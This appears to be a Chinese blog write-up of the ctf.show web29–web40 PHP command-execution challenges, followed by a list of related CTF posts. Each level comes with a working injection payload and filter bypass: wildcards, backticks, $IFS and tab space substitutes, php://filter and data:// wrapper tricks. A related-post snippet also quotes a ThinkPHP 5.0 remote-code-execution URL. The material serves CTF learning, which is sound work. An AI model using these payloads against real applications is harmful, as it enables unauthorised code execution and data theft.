ctf.show-web方向-命令执行wp

已于 2023-12-03 16:52:24 修改
阅读量906 收藏 16
点赞数 20
文章标签: linux 运维 服务器
于 2023-11-23 10:20:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/J1ng_Hong/article/details/134569076
版权

web29

eval我们用system直接执行,flag大小写被过滤了。其实这题可以用反斜杠绕过,但是为了增长知识点,还是用新方法。那就通配符吧。payload:

?c=system('cat f*');

 打开源代码可以看到flag。

web30

system被ban了,用``这个符号可以代替命令执行,所以payload:

?c=echo `cat f*`;

 然后查看源码找到flag。

web31

这题空格被ban了,空格绕过的方法有:

  • $IFS$9
  • $IFS
  • %20
  • %09(代表\t,即tab,就是四个空格)
  • <和<>
  • ${IFS}

我们随便拿一个用就行,cat也被ban了,那就tac,payload:

?c=echo%09`tac%09f*`;

web32

本题echo也被ban了,所以只能用文件包含命令了:

在include文件包含中,使用php伪协议进行文件的读取,payload:

?c=include$_GET[J]?%3E&J=php://filter/convert.base64-encode/resource=flag.php

 然后拿去base64解密就行了。

web33

多ban了个双引号,其他和刚刚一样,payload不变:

?c=include$_GET[J]?%3E&J=php://filter/convert.base64-encode/resource=flag.php

  然后拿去base64解密就行了。

web34

也和上题一样,payload:

?c=include$_GET[J]?%3E&J=php://filter/convert.base64-encode/resource=flag.php

 然后拿去base64解密就行了。

web35

也和上题一样,payload:

?c=include$_GET[J]?%3E&J=php://filter/convert.base64-encode/resource=flag.php

 然后拿去base64解密就行了。

web36

也和上题一样,payload:

?c=include$_GET[J]?%3E&J=php://filter/convert.base64-encode/resource=flag.php

 然后拿去base64解密就行了。

web37

本题过滤了flag:

所以不能使用php协议进行读取了,我们用data协议进行读取,payload:

?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGYqIikKPz4=

 (其中这段base64编码是:
<?php 
system("tac f*")
?>)

web38

也和上题一样,payload:

?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGYqIikKPz4=

然后就得到了flag。

web39

跟上题类似,但是后面加了后缀:

我们可以在payload最后加上注释,把后面的.php给注释掉,payload:

?c=data://text/plain,<?=system(%27tac%20fla*.php%27);?>#

然后就得到了flag。

web40

这题过滤了很多符号,可以用字母和小括号。它过滤的是中文的小括号:

但是函数调用不会用,这里看了wp发现了三个方法:

?c=eval(next(reset(get_defined_vars())));&1=system("tac%20flag.php"); 

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

然后就得到了flag。

J1ng_Hong
关注
ctf.show与学习笔记
Q221022的博客
01-29 3185
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
[ctf web]上传user.ini绕过 文件上传漏洞 ctfshhow-web153 wp
ShenZ的博客
07-27 1103
这个太糟糕了,我typora截图好多,不知道有没有放乱掉 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以 找到这两个auto_append_file和auto_prepend_file,作用: 一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。 因为.user.ini只对他同一目录下的文件起作用,也就是
ctf.show web web1-web10
qq_61993117的博客
09-17 1945
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
ctf.show 愚人杯
Welcome To Myon'Blog !
04-02 2644
愚人杯,ctf.show,MISC,WEB,base编码,PHP伪协议,010editor,zip伪加密,png
ctf.show
nidaxin的博客
02-05 3068
爆破 21.【自定义迭代器】 先抓包看看,返回包里面有个admin,所以就猜测用户名是admin
ctf.show 入门篇
Sky_Bird_的博客
12-03 1139
ctf.show web入门 1.web 1 打开后如图所示,按F12,看到flag 2.web 2 打开后发现按F12没有用,直接在网址前加view-source: 拿到flag 3.
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTF WP记录 ---web
yiyisuzhi的博客
11-08 861
说明:本人网安小白,单纯的想记录通过CTF来巩固自己所学的知识,见证自己的成长 flag:一周四篇,不定期更新,从零开始,前期尽量解释清楚涉及到的所有知识点。 第一题:“百度杯”CTF比赛 2017 二月场 爆破-1 打开题目连接直接显示了一段代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);");
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1364
ctfshow web29 web30 web31
CTF-WEB入门DOC-2019版1
08-03
【CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
攻防世界(进阶刷题)php_rce 以及ctf.show注入通关
qq_62046696的博客
06-01 1269
php_rce 这道题考察php远程漏洞问题 打开界面一看, 然后看师傅们的wp都是直接去,github去查Think PHP V5漏洞 然后随便找了一个输了进去发现,提示我们要用5.02的版本漏洞 6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ...
ctf_show笔记篇(web入门---SSTI)
whale_waves的博客
04-08 1072
模板引擎是为了让用户界面以及业务数据分离开才产生的,模板引擎会生成特定的文档,然后通过模板引擎生成前端html代码,然后再获取用户数据再放到渲染函数里渲染,最后将生成的html代码个渲染好的数据结合拿给浏览器呈现给用户。
【CTFshow 】web 通关 1.0
人若无名,便可专心练剑
03-25 1143
打开题目链接,一看就是一道文件包含的PHP伪协议题目,但是这里我们必须得判断使用什么伪协议,我开始使用的是filter伪协议,确实可以执行,但是有个尴尬的问题,就是不知道读谁,那个flag文件不知道,我开始尝试了flag.php,但是没用,/etc/passwd都出来了。这里经过测试,发现存在空格过滤了,我们利用/**/进行绕过空格,会发现页面发生了变化,说明绕过成功,并且确实存在sql注入,那么我们这里还是跟前面的题目一样,利用union联合注入。基本的原理是这样的,但更严谨的字符串格式是,
ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)
wangyuxiang946的博客
09-08 1万+
ctf.show 萌新模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
ctf.show命令执行(web29-web124)
wanan的博客
08-31 6331
ctf.show命令执行(web29-web124)
CTFSHOW easyrsa1-6 Writeup
abtgu的博客
09-17 2466
easyrsa1 题目: 无 解题思路: 题中给了e,n,c,可以分解n得到p,q,在线分解大整数网址http://www.factordb.com/index.php 。脚本如下: import gmpy2 import binascii e = 65537 n = 1455925529734358105461406532259911790807347616464991065301847 c = 69380371057914246192606760686152233225659503366319332
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
ctf.show(超详解)——sql注入web171-web182
最新发布
2201_76115387的博客
07-28 534
sql注入
【ctf.show-web赛题】
一纸荒芜的博客
03-21 2879
主要分享自己做题的心得和积累,共勉之。
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值